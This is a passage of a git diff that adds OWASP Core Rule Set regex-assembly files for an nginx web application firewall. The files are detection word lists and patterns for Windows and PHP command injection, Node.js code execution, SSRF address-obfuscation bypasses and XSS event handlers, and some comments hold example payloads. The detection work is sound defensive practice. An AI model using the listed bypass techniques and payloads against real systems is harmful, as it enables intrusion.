+ syncappvpublishingserver
+ syssetup
+ te@
+ tracker
+ ttdinject
+ tttracer
+ unregmp2
+ update
+ url
+ utilityfunctions
+ vbc
+ verclsid
+ visualuiaverifynative
+ vsiisexelauncher
+ vsjitdebugger
+ wab
+ wfc
+ winget
+ winrm
+ winword
+ wlrmdr
+ wmic
+ workfolders
+ 
wscript
+ wsl
+ wsreset
+ wt@
+ wuauclt
+ xwizard
+ zipfldr
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/932380.ra b/nginx/config/owasp-crs/regex-assembly/932380.ra
new file mode 100644
index 00000000..3242abdf
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/932380.ra
@@ -0,0 +1,23 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Word list for rule 932380 (RCE Windows command injection part 2/2)
+##!
+##!+ i
+
+##! extension/switches suffix
+##! cmd.com, cmd.exe, etc.
+##!$ (?:\.[\"\^]*\w+)?
+##! cmd/h
+##!$ \b
+
+##! starting tokens prefix
+##!> assemble
+ ##!> include windows-commands-prefix
+
+ ##!> cmdline windows
+
+ ##!> include-except windows-commands windows-commands-fps
+
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/933131.ra b/nginx/config/owasp-crs/regex-assembly/933131.ra
new file mode 100644
index 00000000..717b5d37
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/933131.ra
@@ -0,0 +1,19 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+AUTH_TYPE
+HTTP_ACCEPT
+HTTP_ACCEPT_CHARSET
+HTTP_ACCEPT_ENCODING
+HTTP_ACCEPT_LANGUAGE
+HTTP_CONNECTION
+HTTP_HOST
+HTTP_KEEP_ALIVE
+HTTP_REFERER
+HTTP_USER_AGENT
+HTTP_X_FORWARDED_FOR
+ORIG_PATH_INFO
+PATH_INFO
+PATH_TRANSLATED
+QUERY_STRING
+REQUEST_URI
diff --git a/nginx/config/owasp-crs/regex-assembly/933160.ra b/nginx/config/owasp-crs/regex-assembly/933160.ra
new file mode 100644
index 00000000..ce664710
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/933160.ra
@@ -0,0 +1,54 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##! optional opening parenthesis before command +##!^ \b\(? +##! optional quotes +##!^ ['\"]* + +##! match comments: `/*...*/`, `//...`, `#...` +##!$ (?:/\*.*\*/|//.*|#.* +##! match white space and quotes +##!$ |\s|\")* + +##! optional quotes +##!$ ['\"]* +##! optional closing parenthesis after command +##!$ \)?\s* + +##! mandatory parentheses containing optional parameters +##!$ \(.*\) + +assert +assert_options +chr +create_function +eval +exec +file +filegroup +glob +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +is_a +md5 +opendir +passthru +popen +readfile +tmpfile +unpack + +##! English words, or potential snippets of them, are added here to perform a regex match. +##! Compared to the parallel match performed by 933150, fewer false positives will be generated. +exp +ord +prev +stat +substr +system +unlink diff --git a/nginx/config/owasp-crs/regex-assembly/933161.ra b/nginx/config/owasp-crs/regex-assembly/933161.ra new file mode 100644 index 00000000..e6e25f75 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933161.ra 
@@ -0,0 +1,104 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! File autogenerated by util/php-dictionary-gen with: -a 30 -F 90000 -s ../fp-finder/spell.sh + +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) + +abs +asin +assert +assert_options +basename +checkdate +chr +chroot +compact +constant +copy +cos +cosh +count +create_function +crypt +current +date +decoct +define +defined +dir +end +eval +exec +exp +explode +extract +file +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +flock +floor +flush +glob +hash +header +idate +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +implode +is_a +key +link +log +mail +max +md5 +min +name +next +opendir +ord +pack +pass +passthru +pi +popen +pow +prev +rand +range +readfile +rename +reset +round +serialize +shuffle +sin +sleep +sort +stat +substr +symlink +syslog +system +tan +time +tmpfile +touch +trim +ucfirst +unlink +unpack +virtual diff --git a/nginx/config/owasp-crs/regex-assembly/933200.ra b/nginx/config/owasp-crs/regex-assembly/933200.ra new file mode 100644 index 00000000..a37d8b31 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/933200.ra 
@@ -0,0 +1,32 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! PHP Wrappers
+##!
+##! PHP comes with many built-in wrappers for various URL-style protocols for
+##! use with the filesystem functions such as fopen(), copy(), file_exists() and
+##! filesize(). Abusing of PHP wrappers like phar:// could lead to RCE as
+##! describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even
+##! wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and
+##! expect:// to RCE.
+##!
+##! Valid PHP wrappers can be found in the PHP documentation here:
+##! https://www.php.net/manual/en/wrappers.php
+
+##! Suffix marker: all options end with ://
+##!$ ://
+
+bzip2
+expect
+glob
+ogg
+phar
+rar
+ssh2
+ssh2.shell
+ssh2.exec
+ssh2.tunnel
+ssh2.sftp
+ssh2.scp
+zip
+zlib
diff --git a/nginx/config/owasp-crs/regex-assembly/933210.ra b/nginx/config/owasp-crs/regex-assembly/933210.ra
new file mode 100644
index 00000000..6162369e
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/933210.ra
@@ -0,0 +1,31 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Helpers
+##!> define single_or_double_quotes ['"]
+##!> define string_in_round_brackets \(.+\)
+
+##!$ ;
+
+##!> assemble
+ ##! example payload: (system)(ls);
+ {{string_in_round_brackets}}{{string_in_round_brackets}}
+
+ ##! example payload: (sys)"tem"(ls);
+ {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}}
+
+ ##! example payload: a=system&b=$_GET[0](ls);
+ \[\d+\]{{string_in_round_brackets}}
+
+ ##! example payload: {0}("ls")
+ \{\d+\}{{string_in_round_brackets}}
+
+ ##! example payload: $a("ls")
+ \$[^(\),.;\x5c/]+{{string_in_round_brackets}}
+
+ ##! example payload: "system"("ls")
+ {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}}
+
+ ##! example payload: (string)system("ls")
+ \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\)
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/933211.ra b/nginx/config/owasp-crs/regex-assembly/933211.ra
new file mode 100644
index 00000000..77a935a2
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/933211.ra
@@ -0,0 +1,30 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Helpers
+##!> define single_or_double_quotes ['"]
+##!> define string_in_round_brackets \(.+\)
+##!$ (?:;|$)?
+
+##!> assemble
+ ##! example payload: (system)(ls)
+ {{string_in_round_brackets}}{{string_in_round_brackets}}
+
+ ##! example payload: (sys)"tem"(ls)
+ {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}}
+
+ ##! example payload: $_GET[0]("ls")
+ \[\d+\]{{string_in_round_brackets}}
+
+ ##! example payload: {0}("ls")
+ \{\d+\}{{string_in_round_brackets}}
+
+ ##! example payload: $a("ls")
+ \$[^(\),.;\x5c/]+{{string_in_round_brackets}}
+
+ ##! example payload: "system"("ls")
+ {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}}
+
+ ##! example payload: (string)system("ls")
+ \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\)
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/934100.ra b/nginx/config/owasp-crs/regex-assembly/934100.ra
new file mode 100644
index 00000000..00d76a5c
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/934100.ra
@@ -0,0 +1,230 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the rule uses `multiMatch` and `removeWhitespace. +##! The explicit white space matches will be matched before +##! `removeWhitespace` is applied, everything else will be matched +##! after white space removal. + +##!> define js-prop-start \[['\"`] +##!> define js-prop-start-dynamic \[ +##!> define js-prop-finish ['\"`]\] + + +##! node-serialize serialized function flag +_\$\$ND_FUNC\$\$_ +__js_function +\beval\( +String\.fromCharCode +function\(\){ +new\s+Function\s*\( +this\.constructor +module\.exports= +\(\s*\Wchild_process\W\s*\) + + +##!> assemble + \( + \.call\( + ##!=< js-call +##!< + +##! All "process" method names +##! Note that `sync` will be appended optionally to all, as many +##! of the names have a twin with the `sync` suffix. +##!> assemble + access + appendfile + argv + availability + caveats + chmod + chown + close + copyfile + cp + createreadstream + createwritestream + exec + execfile + exists + fchmod + fchown + fdata + ##! yes, fdatasyncsync + fdatasync + fstat + ##! yes, fsyncsync + fsync + futimes + inodes + lchmod + link + lstat + lutimes + mkdir + mkdtemp + open + opendir + read + readdir + readfile + readlink + readv + rename + rm + spawn + spawnfile + stat + symlink + truncate + unlink + unwatchfile + utimes + watchfile + writefile + write + writev + ##!=> + (?:sync)? + ##!=< process-funcs +##!< + +##! All "process" prop names +##!> assemble + binding + constructor + env + global + main + mainModule + process + require + ##!=< process-props +##!< + +##! All "console" method names +##!> assemble + debug + error + info + trace + warn + ##!=< console-funcs +##!< + +##! All "require" method names +##!> assemble + resolve + ##!=< require-funcs +##!< + +##! All "require" property names +##!> assemble + main + extensions + cache + ##!=< require-props +##!< + + +##! 
"process" payloads +##!> assemble + process + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> process-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> process-props + ##!< + + ##! Match properties functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> process-funcs + ##!< + ##!> assemble + ##!=> process-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! Match dynamic property access: process[req.query.a] +##! Note that we don't require `process` as a prefix here +##!> assemble + ##!=> process-props + {{js-prop-start-dynamic}} +##!< + + +##! "console" payloads +##!> assemble + console + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> console-funcs + ##!=> js-call + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!=> console-funcs + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! "require" payloads +##!> assemble + require + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> require-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> require-props + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> require-funcs + ##!< + ##!> assemble + ##!=> require-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/934101.ra b/nginx/config/owasp-crs/regex-assembly/934101.ra new file mode 100644 index 00000000..a2ac0723 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/934101.ra 
@@ -0,0 +1,14 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!$ \s*\(
+
+close
+exists
+fork
+open
+read
+spawn
+watch
+write
+require
diff --git a/nginx/config/owasp-crs/regex-assembly/934120.ra b/nginx/config/owasp-crs/regex-assembly/934120.ra
new file mode 100644
index 00000000..09ff0679
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/934120.ra
@@ -0,0 +1,187 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Bypasses and techniques here come from: +##! - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery +##! - https://github.com/cujanovic/SSRF-Testing + +##!+ i + +##! add capture group +##!^ ( +##!$ ) + +##! This regex starts with a list of all the schemes that can be used to make a request +##!> assemble + ##!> include url-schemes + ##!=> + :// + ##!=> + + ##! http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) + ##! http://2852039166/ Dotless decimal + ##! http://7147006462/ Dotless decimal with overflow + \d{10} + + ##! http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal + (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} + + ##! http://0xA9FEA9FE/ Dotless hexadecimal + 0x[a-f0-9]{8} + + ##! http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow + 0x[a-f0-9]{16} + + ##! http://0251.0376.0251.0376/ Dotted octal + ##! http://0251.00376.000251.0000376/ Dotted octal with padding + (?:0{1,4}\d{1,3}\.){3}0{1,4}\d{1,3} + + ##! http://169.254.43518/ + \d{1,3}\.\d{1,3}\.\d{5} + + ##! http://169.16689662/ + \d{1,3}\.\d{8} + + ##! glibc Name Service Switch abuse + ##! http://\\l\\o\\c\\a\\l\\h\\o\\s\\t (while underscore is not valid RFC syntax, it is allowed and might be used) + (?:\x5c\x5c[a-z\d-]\.?_?)+ + + ##! http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 (base regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below)) + ##! http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded + ##! http://[fe80::%zone1] link-local unicast with zone ID + ##! http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 + ##! http://[::] the unspecified address + + ##! Something that looks like IPv6 in a URL. + ##! Matches full and compressed IPv6, link-local IPv6 with + ##! zone ID, and embedded IPv4. + ##! 
We could match the IPv6 specification here but that would + ##! decrease performance of the regular expression and would + ##! actually increase the possibility for bypasses. + \[[a-f\d:]+(?:[\d.]+|%\w+)?\] + + + ##! These come from https://github.com/cujanovic/SSRF-Testing + ##! These bypasses work by confusing URL parsers in different languages (e.g., PHP, Python, Ruby, Perl) + ##! and libraries (e.g. cURL). The bypasses are parser specific but will often be combined to break + ##! multiple parsers with one try. The goal is often to get the application to call another library + ##! with the malicious URL, e.g. libcurl or glibc (name resolution via gethostbyname(), see also + ##! Name Service Switch abuse above). + + ##! http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) + + ##! http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) + + ##! http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ + ##! http://google.com:80+&@google.com:80#+@127.88.23.245:22/ + + ##! create ip-or-domain for later use + ##!> assemble + (?:\d{1,3}\.){3,3}\d{1,3} + [a-z][\w\-\.]{1,255} + ##!=> + :\d{1,5} + ##!=< ip-or-domain + ##!< + + ##!> assemble + ##! domain + port + [a-z][\w\-\.]{1,255}:\d{1,5} + ##!=> + + ##! at least one of the evasion techniques + ##!> assemble + ##! technique 1 + ##!> assemble + ##! possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + \/? + ##!=> + ##!< + + ##! technique 2 + ##!> assemble + ##! fragment to confuse URL parsers + # + ##!=> + + ##! 
possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + /? + ##!=> + ##!< + ##!< + ##!=> + + + ##!=> + ##!< + + ##! Enclosed alphanumerics are used for evasion (https://en.wikipedia.org/wiki/Enclosed_Alphanumerics). + ##! See also https://github.com/cujanovic/SSRF-Testing. + ##! These will normally sound many alarms, but having them flagged as ssrf attempt makes sense + + ##!> assemble + ##! ⓪,①,②,③,④,⑤,⑥,⑦,⑧,⑨,⑩,⑪,⑫,⑬,⑭,⑮,⑯,⑰,⑱,⑲,⑳ + \xe2\x91[\xaa\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3] + ##! ⑴,⑵,⑶,⑷,⑸,⑹,⑺,⑻,⑼,⑽,⑾,⑿ + \xe2\x91[\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! ⒀,⒁,⒂,⒃,⒄,⒅,⒆,⒇ + \xe2\x92[\x80\x81\x82\x83\x84\x85\x86\x87] + ##! ⒈,⒉,⒊,⒋,⒌,⒍,⒎,⒏,⒐,⒑,⒒,⒓,⒔,⒕,⒖,⒗,⒘,⒙,⒚,⒛ + \xe2\x92[\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⒜,⒝,⒞,⒟,⒠,⒡,⒢,⒣,⒤,⒥,⒦,⒧,⒨,⒩,⒪,⒫,⒬,⒭,⒮,⒯,⒰,⒱,⒲,⒳,⒴,⒵ + \xe2\x92[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5] + ##! Ⓐ,Ⓑ,Ⓒ,Ⓓ,Ⓔ,Ⓕ,Ⓖ,Ⓗ,Ⓘ,Ⓙ + \xe2\x92[\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! Ⓚ,Ⓛ,Ⓜ,Ⓝ,Ⓞ,Ⓟ,Ⓠ,Ⓡ,Ⓢ,Ⓣ,Ⓤ,Ⓥ,Ⓦ,Ⓧ,Ⓨ,Ⓩ + \xe2\x93[\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f] + ##! ⓐ,ⓑ,ⓒ,ⓓ,ⓔ,ⓕ,ⓖ,ⓗ,ⓘ,ⓙ,ⓚ,ⓛ + \xe2\x93[\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⓜ,ⓝ,ⓞ,ⓟ,ⓠ,ⓡ,ⓢ,ⓣ,ⓤ,ⓥ,ⓦ,ⓧ,ⓨ,ⓩ + \xe2\x93[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9] + ##! ⓫,⓬,⓭,⓮,⓯,⓰,⓱,⓲,⓳,⓴ + \xe2\x93[\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4] + ##! ⓿,⓵,⓶,⓷,⓸,⓹,⓺,⓻,⓼,⓽,⓾ + \xe2\x93[\xbf\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe] + ##! ideographic full stop: 。 + \xe3\x80\x82 + ##!=< enclosed-alnums + ##!< + + ##! an IP could start with digits and dots + ##!> assemble + [\d.]{0,11} + ##!=> + ##!> assemble + ##!=> enclosed-alnums + ##!< + ##!=> + ##! 
match all for capture
+
+
+ ##!=>
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/934140.ra b/nginx/config/owasp-crs/regex-assembly/934140.ra
new file mode 100644
index 00000000..ec33ac56
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/934140.ra
@@ -0,0 +1,4 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+\@\{.*\}
diff --git a/nginx/config/owasp-crs/regex-assembly/934150.ra b/nginx/config/owasp-crs/regex-assembly/934150.ra
new file mode 100644
index 00000000..22786be6
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/934150.ra
@@ -0,0 +1,4 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+Process\s*\.\s*spawn\s*\(
diff --git a/nginx/config/owasp-crs/regex-assembly/934160.ra b/nginx/config/owasp-crs/regex-assembly/934160.ra
new file mode 100644
index 00000000..f62d06d9
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/934160.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Match while(true) like loops
+##!> assemble
+##!^ while\s*\([\s(]*
+##!$ .*\)
+ ##!> include js-truthy-values
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/934170.ra b/nginx/config/owasp-crs/regex-assembly/934170.ra
new file mode 100644
index 00000000..8ea60176
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/934170.ra
@@ -0,0 +1,10 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ ^
+
+##!> assemble
+ data:
+ ##!=>
+ ##!> include charset-specification-no-anchors
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/941130.ra b/nginx/config/owasp-crs/regex-assembly/941130.ra
new file mode 100644
index 00000000..422c34e6
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/941130.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+##!^ .
+##!$ \b
+
+\bxlink:href
+\bxhtml
+\bxmlns
+!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM
+!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC
+\bdata:text/html
+\bformaction
+@import
+;base64
+\bpattern\b.*?=
diff --git a/nginx/config/owasp-crs/regex-assembly/941160.ra b/nginx/config/owasp-crs/regex-assembly/941160.ra
new file mode 100644
index 00000000..bccb2a92
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/941160.ra
@@ -0,0 +1,370 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*? + ##!=< js-prop-prefix +##!< + +##!> assemble + s\W*?c\W*?r\W*?i\W*?p\W*?t + f\W*?o\W*?r\W*?m + s\W*?t\W*?y\W*?l\W*?e + s\W*?v\W*?g + m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e + l\W*?i\W*?n\W*?k[^>\w] + o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] + e\W*?m\W*?b\W*?e\W*?d[^>\w] + a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] + p\W*?a\W*?r\W*?a\W*?m[^>\w] + i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] + b\W*?a\W*?s\W*?e[^>\w] + b\W*?o\W*?d\W*?y[^>\w] + m\W*?e\W*?t\W*?a[^>\w] + i\W*?m\W*?a?\W*?g\W*?e?[^>\w] + v\W*?i\W*?d\W*?e\W*?o[^>\w] + a\W*?u\W*?d\W*?i\W*?o[^>\w] + b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] + s\W*?e\W*?t[^>\w] + a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] + ##!=< js-payloads +##!< + + +##!> assemble + (?:<\w.*[\s/]|['\"](?:.*[\s/])?) + ##!=< html-properties-prefix +##!< + +##!> assemble + background + formaction + lowsrc + onabort + onactivate + onadapteradded + onaddtrack + onafterprint + onafterscriptexecute + onafterupdate + onalerting + onanimationcancel + onanimationend + onanimationiteration + onanimationstart + onantennastatechange + onappcommand + onaudioend + onaudioprocess + onaudiostart + onauxclick + onbeforeactivate + onbeforecopy + onbeforecut + onbeforedeactivate + onbeforeeditfocus + onbeforeinput + onbeforepaste + onbeforeprint + onbeforescriptexecute + onbeforetoggle + onbeforeunload + onbeforeupdate + onbegin + onbeginEvent + onblocked + onblur + onbounce + onboundary + onbroadcast + onbusy + oncached + oncallschanged + oncanplay + oncanplaythrough + oncardstatechange + oncellchange + oncfstatechange + onchange + onchargingchange + onchargingtimechange + onchecking + onclick + onclose + oncommand + oncommandupdate + oncomplete + oncompositionend + oncompositionstart + oncompositionupdate + onconnected + onconnecting + oncontextmenu + oncontrolselect + oncopy + oncuechange + oncut + 
ondataavailable + ondatachange + ondataerror + ondatasetchanged + ondatasetcomplete + ondblclick + ondeactivate + ondeliveryerror + ondeliverysuccess + ondevicefound + ondevicelight + ondevicemotion + ondeviceorientation + ondeviceproximity + ondialing + ondisabled + ondischargingtimechange + ondisconnected + ondisconnecting + ondomactivate + ondomattrmodified + ondomcharacterdatamodified + ondomfocusin + ondomfocusout + ondommousescroll + ondomnodeinserted + ondomnodeinsertedintodocument + ondomnoderemoved + ondomnoderemovedfromdocument + ondomsubtreemodified + ondownloading + ondragdrop + ondragend + ondragenter + ondragexit + ondraggesture + ondragleave + ondragover + ondragstart + ondrop + ondurationchange + onemptied + onenabled + onend + onended + onendEvent + onenter + onerror + onerrorupdate + onexit + onfailed + onfilterchange + onfinish + onfocus + onfocusin + onfocusout + onformchange + onforminput + onfullscreenchange + ongamepadaxismove + ongamepadbuttondown + ongamepadbuttonup + ongamepadconnected + ongamepaddisconnected + onget + onhashchange + onheadphoneschange + onheld + onhelp + onholding + onicccardlockerror + oniccinfochange + onincoming + oninput + oninvalid + onkeydown + onkeypress + onkeyup + onlevelchange + onload + onloadeddata + onloadedmetadata + onloadend + onloadstart + onlosecapture + only + onmark + onmessage + onmousedown + onmouseenter + onmouseleave + onmousemove + onmouseout + onmouseover + onmouseup + onmousewheel + onmove + onmoveend + onmovestart + onmozafterpaint + onmozaudioavailable + onmozbeforeresize + onmozedgeuicanceled + onmozedgeuicompleted + onmozedgeuistarted + onmozfullscreenchange + onmozfullscreenerror + onmozmagnifygesture + onmozmagnifygesturestart + onmozmagnifygestureupdate + onmozmousehittest + onmozmousepixelscroll + onmoznetworkdownload + onmoznetworkupload + onmozorientationchange + onmozpointerlockchange + onmozpointerlockerror + onmozpresstapgesture + onmozrotategesture + onmozrotategesturestart + 
onmozrotategestureupdate + onmozscrolledareachanged + onmozswipegesture + onmozswipegestureend + onmozswipegesturestart + onmozswipegestureupdate + onmoztapgesture + onmoztimechange + onnomatch + onnoupdate + onobsolete + onoffline + ononline + onopen + onoverflow + onoverflowchanged + onpagehide + onpageshow + onpaint + onpaste + onpause + onplay + onplaying + onpointerdown + onpointerenter + onpointerleave + onpointermove + onpointerout + onpointerover + onpointerrawupdate + onpointerup + onpopstate + onpopuphidden + onpopuphiding + onpopupshowing + onpopupshown + onprogress + onpropertychange + onratechange + onreadystatechange + onreceived + onremovetrack + onrepeat + onrepeatEvent + onrequest + onreset + onresize + onresult + onresume + onresuming + onretrieving + onrowenter + onrowexit + onrowsdelete + onrowsinserted + onscroll + onscrollend + onsearch + onseekcomplete + onseeked + onseeking + onselect + onselectionchange + onselectstart + onsending + onsent + onset + onshow + onsoundend + onsoundstart + onspeechend + onspeechstart + onstalled + onstart + onstatechange + onstatuschanged + onstkcommand + onstksessionend + onstop + onsubmit + onsuccess + onsuspend + onsvgabort + onsvgerror + onsvgload + onsvgresize + onsvgscroll + onsvgunload + onsvgzoom + ontext + ontimeout + ontimeupdate + ontoggle + ontouchcancel + ontouchend + ontouchenter + ontouchleave + ontouchmove + ontouchstart + ontransitioncancel + ontransitionend + ontransitionrun + ontransitionstart + onunderflow + onunhandledrejection + onunload + onupdateready + onupgradeneeded + onuserproximity + onussdreceived + onversionchange + onvoicechange + onvolumechange + onwaiting + onwarning + onwebkitanimationend + onwebkitanimationiteration + onwebkitanimationstart + onwebkittransitionend + onwheel + onzoom + ping + src + style + ##!=< html-properties +##!< + +##!> assemble + [\s\x08]*?= + ##!=< html-properties-end +##!< + +##!> assemble + ##!=> js-prop-prefix + ##!=> js-payloads +##!< + +##!> 
assemble + ##!=> html-properties-prefix + ##!=> html-properties + ##!=> html-properties-end +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/941210.ra b/nginx/config/owasp-crs/regex-assembly/941210.ra new file mode 100644 index 00000000..45f15516 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/941210.ra 
@@ -0,0 +1,231 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This rule tries to match all the possible ways to write 'javascript' using +##! html entities, and javascript escape sequences. +##! See https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references for examples. +##! And https://www.w3schools.com/charsets/ref_html_ascii.asp for the list of +##! all the possible html entities. + +##!+ i + +##! Matched order is sequential: we first match 'j', then 'a', then 'v', etc. + +##!> define html_entity_hex_prefix �* +##!> define html_entity_dec_prefix �* +##!> define whitespaces [\t\n\r] + +##! html_encoded_whitespace is a list of all the possible ways to write an encoded whitespace +##!> assemble + ##! canonical form + {{whitespaces}} + ##! alternative forms + ##!> assemble + ##! 09 horizontal tab + ##! 10 line feed + ##! 13 carriage return + ##! 0A line feed (hex) + ##! 0D carriage return (hex) + {{html_entity_dec_prefix}}9;? + {{html_entity_dec_prefix}}10;? + {{html_entity_dec_prefix}}13;? + {{html_entity_hex_prefix}}A;? + {{html_entity_hex_prefix}}D;? + &tab; + 